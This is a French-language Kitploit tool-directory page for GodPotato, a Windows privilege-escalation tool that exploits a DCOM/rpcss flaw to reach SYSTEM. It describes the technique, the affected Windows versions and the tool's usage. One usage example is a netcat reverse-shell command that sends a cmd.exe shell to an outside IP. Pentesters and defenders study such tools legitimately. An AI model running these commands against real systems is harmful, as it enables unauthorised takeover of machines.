Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
GodPotato — Outil d'élévation de privilèges basé sur DCOM pour Windows Server 2012-2022 et Windows 8-11, élevant les utilisateurs disposant de ImpersonatePrivilege vers NT AUTHORITY\SYSTEM via la vulnérabilité rpcss oxid. | Kitploit
Outils/GitHubGitHub/beichendream/godpotato
Escalade de PrivilègesExploitationPost-ExploitationTests d'Intrusion
GitHubbeichendream/godpotato

GodPotato

Outil d'élévation de privilèges basé sur DCOM pour Windows Server 2012-2022 et Windows 8-11, élevant les utilisateurs disposant de ImpersonatePrivilege vers NT AUTHORITY\SYSTEM via la vulnérabilité rpcss oxid.

Voir le dépôt
2.3k27329il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

GodPotato

Basé sur l'histoire de l'escalade de privilèges Potato sur 6 ans, depuis le début de RottenPotato jusqu'à la fin de JuicyPotatoNG, j'ai découvert une nouvelle technologie en recherchant DCOM, qui permet l'escalade de privilèges dans Windows 2012 - Windows 2022, désormais tant que vous avez l'autorisation "ImpersonatePrivilege". Alors vous êtes "NT AUTHORITY\SYSTEM", généralement les services WEB et les services de base de données ont l'autorisation "ImpersonatePrivilege".

L'escalade de privilèges Potato est généralement utilisée lorsque nous obtenons des privilèges WEB/base de données. Nous pouvons élever un utilisateur de service avec des privilèges faibles à "NT AUTHORITY\SYSTEM". Cependant, le Potato historique n'a aucun moyen de fonctionner sur le dernier système Windows. Lorsque je recherchais DCOM, j'ai trouvé une nouvelle méthode qui peut effectuer une escalade de privilèges. Il y a quelques défauts dans rpcss lorsqu'il traite oxid, et rpcss est un service qui doit être ouvert par le système, donc il peut fonctionner sur presque n'importe quel système d'exploitation Windows, je l'ai nommé GodPotato

Versions affectées

Windows Server 2012 - Windows Server 2022 Windows8 - Windows 11

Exemple

root@kitploit:~

    FFFFF                   FFF  FFFFFFF
   FFFFFFF                  FFF  FFFFFFFF
  FFF  FFFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
 FFFF        FFFFFFF   FFFFFFFF  FFF   FFF  FFFFFFF  FFFFFFFFF   FFFFFF  FFFFFFFFF    FFFFFF
 FFFF       FFFF FFFF  FFF FFFF  FFF  FFFF FFFF FFFF   FFF      FFF  FFF    FFF      FFF FFFF
 FFFF FFFFF FFF   FFF FFF   FFF  FFFFFFFF  FFF   FFF   FFF      F    FFF    FFF     FFF   FFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF         FFFFF    FFF     FFF   FFFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF      FFFFFFFF    FFF     FFF   FFFF
  FFF   FFF FFF   FFF FFF   FFF  FFF       FFF   FFF   FFF     FFFF  FFF    FFF     FFF   FFFF
  FFFF FFFF FFFF  FFF FFFF  FFF  FFF       FFF  FFFF   FFF     FFFF  FFF    FFF     FFFF  FFF
   FFFFFFFF  FFFFFFF   FFFFFFFF  FFF        FFFFFFF     FFFFFF  FFFFFFFF    FFFFFFF  FFFFFFF
    FFFFFFF   FFFFF     FFFFFFF  FFF         FFFFF       FFFFF   FFFFFFFF     FFFF     FFFF


Arguments:

        -cmd Required:True CommandLine (default cmd /c whoami)

Example:

GodPotato -cmd "cmd /c whoami"


Utilisez le Clsid intégré au programme pour l'escalade de privilèges et exécutez une commande simple

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

Personnalisez Clsid et exécutez des commandes

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

Exécutez des commandes de reverse shell

root@kitploit:~
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

Remerciements

zcgonvh

skay

Licence

Apache License 2.0

Télécharger l’outil